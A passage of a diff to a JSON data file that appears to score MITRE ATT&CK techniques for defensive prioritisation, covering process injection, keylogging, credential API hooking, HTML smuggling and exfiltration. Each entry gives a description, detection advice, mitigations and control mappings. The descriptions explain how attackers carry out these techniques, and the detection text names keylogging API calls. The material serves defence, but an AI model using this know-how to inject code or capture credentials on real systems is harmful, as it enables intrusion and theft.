-                "detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.014",
-                "name": "Process Injection: VDSO Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1055/014",
-                "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  ",
-                "detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
             }
         ],
-        "cumulative_score": 1.9452380952380952,
-        "adjusted_score": 1.9452380952380952,
+        "cumulative_score": 0.19047619047619047,
+        "adjusted_score": 0.19047619047619047,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
+            "10.1",
+            "10.2",
+            "10.7",
             "13.2",
             "13.7"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CM-5",
-            "CM-6",
-            "IA-2",
-            "SC-18",
-            "SC-7",
             "SI-2",
             "SI-3",
-            "SI-4"
+            "SI-4",
+            "SI-7"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.49523809523809526,
-            "mitigation_score": 0.38181818181818183,
-            "detection_score": 0.62
-        },
-        "choke_point_score": 0.44999999999999996,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1056",
-        "name": "Input Capture",
-        "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
-        "url": "https://attack.mitre.org/techniques/T1056",
+        "tid": "T1027.003",
+        "name": "Obfuscated Files or Information: Steganography",
+        "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ",
+        "url": "https://attack.mitre.org/techniques/T1027/003",
         "tactics": [
-            "Collection",
-            "Credential Access"
+            "Defense Evasion"
         ],
-        "detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
+        "detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.",
         "platforms": [
             "Linux",
-            "Network",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Driver: Driver Load",
-            "File: File Modification",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Process: Process Metadata",
-            "Windows Registry: Windows Registry Key Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1056.001",
-                "name": "Input Capture: Keylogging",
-                "url": "https://attack.mitre.org/techniques/T1056/001",
-                "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ",
-                "detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1056.002",
-                "name": "Input Capture: GUI Input Capture",
-                "url": "https://attack.mitre.org/techniques/T1056/002",
-                "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) ",
-                "detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ",
-                "mitigations": [
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
-            {
-                "tid": "T1056.003",
-                "name": "Input Capture: Web Portal Capture",
-                "url": "https://attack.mitre.org/techniques/T1056/003",
-                "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
-                "detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1056.004",
-                "name": "Input Capture: Credential API Hooking",
-                "url": "https://attack.mitre.org/techniques/T1056/004",
-                "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n",
-                "detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
-                "mitigations": []
-            }
+            "File: File Metadata"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
+        "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.6221113542857142,
-        "adjusted_score": 0.6221113542857142,
+        "cumulative_score": 0.12380952380952381,
+        "adjusted_score": 0.12380952380952381,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.014285714285714284,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.25782564
+        "hardware_coverage": false
     },
     {
-        "tid": "T1057",
-        "name": "Process Discovery",
-        "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.",
-        "url": "https://attack.mitre.org/techniques/T1057",
+        "tid": "T1027.004",
+        "name": "Obfuscated Files or Information: Compile After Delivery",
+        "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
+        "url": "https://attack.mitre.org/techniques/T1027/004",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.",
         "platforms": [
             "Linux",
             "Windows",
@@ -3460,153 +3337,23310 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
+            "File: File Creation",
+            "File: File Metadata",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.2606304028571429,
-        "adjusted_score": 0.2606304028571429,
-        "has_car": true,
+        "cumulative_score": 0.1380952380952381,
+        "adjusted_score": 0.1380952380952381,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.04285714285714285,
-            "detection_score": 0.09
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.11777326
+        "hardware_coverage": false
     },
     {
-        "tid": "T1059",
-        "name": "Command and Scripting Interpreter",
-        "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)",
-        "url": "https://attack.mitre.org/techniques/T1059",
+        "tid": "T1027.005",
+        "name": "Obfuscated Files or Information: Indicator Removal from Tools",
+        "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
+        "url": "https://attack.mitre.org/techniques/T1027/005",
         "tactics": [
-            "Execution"
+            "Defense Evasion"
         ],
-        "detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+        "detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
         "platforms": [
             "Linux",
-            "Network",
             "Windows",
             "macOS"
         ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Module: Module Load",
-            "Process: Process Creation",
-            "Script: Script Execution"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1059.001",
-                "name": "Command and Scripting Interpreter: PowerShell",
-                "url": "https://attack.mitre.org/techniques/T1059/001",
-                "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
-                "detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
-                "mitigations": [
-                    {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
-                    },
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.12857142857142856,
+        "adjusted_score": 0.12857142857142856,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1027.006",
+        "name": "Obfuscated Files or Information: HTML Smuggling",
+        "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
+        "url": "https://attack.mitre.org/techniques/T1027/006",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1029",
+        "name": "Scheduled Transfer",
+        "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
+        "url": "https://attack.mitre.org/techniques/T1029",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.19047619047619047,
+        "adjusted_score": 0.19047619047619047,
+        "has_car": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.09047619047619047,
+            "mitigation_score": 0.16363636363636364,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1030",
+        "name": "Data Transfer Size Limits",
+        "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
+        "url": "https://attack.mitre.org/techniques/T1030",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
